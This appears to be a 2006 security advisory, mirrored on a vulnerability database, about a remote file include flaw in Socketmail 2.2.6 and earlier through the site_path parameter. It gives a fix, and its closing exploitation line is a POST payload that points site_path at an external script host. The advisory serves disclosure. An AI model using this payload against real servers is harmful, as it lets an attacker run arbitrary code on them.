Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12844
HistoryMay 27, 2006 - 12:00 a.m.

[MajorSecurity #6]Socketmail <= 2.2.6 - Remote File Include Vulnerability

2006-05-2700:00:00
vulners.com
9

[MajorSecurity]Socketmail <= 2.2.6 - Remote File Include Vulnerability

Software: Socketmail

Version: <=2.2.6

Type: Remote File Include Vulnerability

Date: May, 25th 2006

Vendor: Creative Digital Resources

Page: http://socketmail.com

Risc: High

Credits:

'Aesthetico'

http://www.majorsecurity.de

Affected Products:

Socketmail Lite 2.2.6 and prior
Socketmail Pro 2.2.6 and prior

Description:

SocketMail is a powerful, scalable and fully customisable e-mail solution.
Ideal messaging solution for sizes web site and enterprises.

Requirements:

register_globals = On
magic_quotes = On

Vulnerability:

Input passed to the "site_path" parameter in "index.php" and "inc-common.php" is not
properly verified, before it is used to include files.
This can be exploited to execute arbitrary code by including files from external resources.

Solution:

Edit the source code to ensure that input is properly sanitised.
Set "register_globals" to "Off".

Exploitation:

Post data:

site_path=http://www.yourspace.com/yourscript.php?